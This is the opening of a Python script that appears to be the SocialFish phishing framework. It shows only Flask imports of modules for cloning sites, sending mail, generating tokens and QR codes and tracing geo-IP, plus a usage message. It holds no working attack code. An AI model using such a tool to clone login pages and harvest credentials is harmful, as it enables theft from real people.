 
 ​#!/usr/bin/env python3 
 ​# 
 ​from​ ​flask​ ​import​ ​Flask​, ​request​, ​render_template​, ​jsonify​, ​redirect​, ​g​, ​flash 
 ​from​ ​core​.​config​ ​import​ ​* 
 ​from​ ​core​.​view​ ​import​ ​head 
 ​from​ ​core​.​scansf​ ​import​ ​nScan 
 ​from​ ​core​.​clonesf​ ​import​ ​clone 
 ​from​ ​core​.​dbsf​ ​import​ ​initDB 
 ​from​ ​core​.​genToken​ ​import​ ​genToken​, ​genQRCode 
 ​from​ ​core​.​sendMail​ ​import​ ​sendMail 
 ​from​ ​core​.​tracegeoIp​ ​import​ ​tracegeoIp 
 ​from​ ​core​.​cleanFake​ ​import​ ​cleanFake 
 ​from​ ​core​.​genReport​ ​import​ ​genReport 
 ​from​ ​core​.​report​ ​import​ ​generate_unique​ ​#>> new line 
 ​from​ ​datetime​ ​import​ ​date 
 ​from​ ​sys​ ​import​ ​argv​, ​exit​, ​version_info 
 ​import​ ​colorama 
 ​import​ ​sqlite3 
 ​import​ ​flask_login 
 ​import​ ​os 
  
 ​# Verificar argumentos 
 ​if​ ​len​(​argv​) ​<​ ​2​: 
 ​    ​print​(​"./SocialFish <youruser> <yourpassword>​\n​\n​i.e.: ./SocialFish.py root pass"​) 
 ​    ​exit​(​0​)
